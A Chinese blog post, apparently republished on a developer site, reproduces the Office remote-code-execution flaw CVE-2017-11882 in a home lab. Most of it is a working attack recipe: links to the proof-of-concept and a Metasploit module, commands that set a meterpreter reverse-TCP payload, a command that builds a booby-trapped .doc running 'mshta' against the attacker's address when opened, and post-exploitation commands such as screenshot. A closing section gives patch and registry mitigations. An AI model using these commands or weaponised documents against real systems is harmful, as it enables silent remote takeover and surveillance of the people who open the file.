CVE-2017-11882复现及编写脚本实现自动化

栏目: 编程工具 · 发布时间: 6年前

内容简介:2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882)。该漏洞为Office内存破坏漏洞,影响目前流行的所有Office版本。攻击者可以利用漏洞以当前登录的用户的身份执行任意命令。 由于漏洞影响面较广,漏洞披露后,金睛安全研究团队持续对漏洞相关攻击事件进行关注。11月19日,监控到了已有漏洞POC在网上流传,随即迅速对相关样本进行了分析。目前该样本全球仅微软杀毒可以检测。Office 365Mi

前言

2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882)。该漏洞为Office内存破坏漏洞,影响目前流行的所有Office版本。攻击者可以利用漏洞以当前登录的用户的身份执行任意命令。 由于漏洞影响面较广,漏洞披露后,金睛安全研究团队持续对漏洞相关攻击事件进行关注。11月19日,监控到了已有漏洞POC在网上流传,随即迅速对相关样本进行了分析。目前该样本全球仅微软杀毒可以检测。

漏洞影响版本:

Office 365

Microsoft Office 2000

Microsoft Office 2003

Microsoft Office 2007 Service Pack 3

Microsoft Office 2010 Service Pack 2

Microsoft Office 2013 Service Pack 1

Microsoft Office 2016

攻击机:kali Linux 2017.03

攻击机IP:192.168.137.130

靶机:win7

含有漏洞的Office版本:Office 2016

利用复现过程

下载安装office 2016:直接上msdn.itellyou.cn下载,安装在靶机上

种子链接:

ed2k://|file|cn_office_professional_plus_2016_x86_x64_dvd_6969182.iso|2588266496|27EEA4FE4BB13CD0ECCDFC24167F9E01|/

下载POC代码到渗透机(用此验证漏洞的存在)

https://pan.baidu.com/s/1jeiN1pm78Jh-sMS3gmlXyg 提取码:m6gjo

下载rb文件到渗透机

https://pan.baidu.com/s/15nURrik3Sk5FXXd8Motx4w 提取码:t1hz

这里都下载到桌面CVE-2017-11882文件夹

在Kali上构造带有 shell 后门的word文件,并开启监听:

将CVE-2017-11882.rb拷贝到metasploit目录中,这里拷贝到目录/usr/share/metasploit-framework/modules/exploits/windows/smb

root@kali:~# cd /usr/share/metasploit-framework/modules/exploits/windows/smb

root@kali:/usr/share/metasploit-framework/modules/exploits/windows/smb# cp ~/Desktop/CVE-2017-11882/CVE-2017-11882.rb CVE-2017-11882.rb

root@kali:/usr/share/metasploit-framework/modules/exploits/windows/smb# ls

CVE-2017-11882复现及编写脚本实现自动化

进入Metasploit框架,搜索CVE-2017-11882:

root@kali:~# msfconsole

msf > search CVE-2017-11882

CVE-2017-11882复现及编写脚本实现自动化

使用CVE-2017-11882.rb模块,开启Meterpreter监听会话:

使用模块:msf > use exploit/windows/smb/CVE-2017-11882

设置tcp反弹对话:msf exploit(CVE-217-11882) > set payload windows/meterpreter/reverse_tcp

设置渗透机ip地址(这里通过ifconfig命令查看):

CVE-2017-11882复现及编写脚本实现自动化

msf exploit(CVE-2017-11882) > set lhost 192.168.137.130

设置路径为11882:msf exploit(CVE-2017-11882) > set uripath 11882

开启渗透,进入监听状态:

msf exploit(CVE-2017-11882) > exploit

使用CVE-2017-11882.py模块,生成带有shell的doc文件:

root@Kali:~/Desktop/CVE-2017-11882/# python CVE-2017-11882.py -c "mshta http://192.168.137.130:8080 " -o 11882-3.doc

此时,CVE-2017-11882目录中增加了另外一个word文件11882-3,而此文件的功能是:打开它的电脑会反弹shell会话到控制机,将11882-3.doc拷贝到靶机win7上

在Win7打开11882-3.doc文件,此时观察Win7靶机和Kali Linux渗透机:

CVE-2017-11882复现及编写脚本实现自动化

当靶机打开文件时,整个过程没有任何弹框,也没有其他异常动作。

此时,在另一段的Kali Linux渗透机,已经获取到shell会话:

CVE-2017-11882复现及编写脚本实现自动化

通过命令sessions查看meterpreter会话:

msf exploit(CVE-2017-11882) > sessions

CVE-2017-11882复现及编写脚本实现自动化

此后便可以通过meterpreter来对会话进行管理:

进入会话:msf exploit(CVE-2017-11882) > sessions 1

查看系统信息:meterpreter > sysinfo

查看当前用户:meterpreter > getuid

截屏:meterpreter > screenshot

CVE-2017-11882复现及编写脚本实现自动化 CVE-2017-11882复现及编写脚本实现自动化

可以看到,安装了最新office 2016版本的win7,因为CVE-2017-11882漏洞,当打开带有shell后门的doc文件时,kali渗透机可以获取到完美的后门并控制win7。

漏洞修复

1.下载微软对此漏洞补丁:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882 并且开启自动更新功能

2.在注册表中禁用该漏洞模块

reg add "HKLM\SOFTWARE\Microsoft\Office\XX.X\Common\COM Compatibility{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\XX.X\Common\COM Compatibility{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD/d 0x400


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

深入理解计算机系统(英文版·第2版)

深入理解计算机系统(英文版·第2版)

[美] Randal E. Bryant、[美] David R. O'Hallaron / 机械工业出版社 / 2011-1 / 128.00元

本书是一本将计算机软件和硬件理论结合讲述的经典教程,内容覆盖计算机导论、体系结构和处理器设计等多门课程。本书的最大优点是为程序员描述计算机系统的实现细节,通过描述程序是如何映射到系统上,以及程序是如何执行的,使读者更好地理解程序的行为为什么是这样的,以及造成效率低下的原因。 相对于第1版,本版主要是反映了过去十年间硬件技术和编译器的变化,具体更新如下: 1. 对系统的介绍(特别是实际使......一起来看看 《深入理解计算机系统(英文版·第2版)》 这本书的介绍吧!

URL 编码/解码
URL 编码/解码

URL 编码/解码

正则表达式在线测试
正则表达式在线测试

正则表达式在线测试

RGB HSV 转换
RGB HSV 转换

RGB HSV 互转工具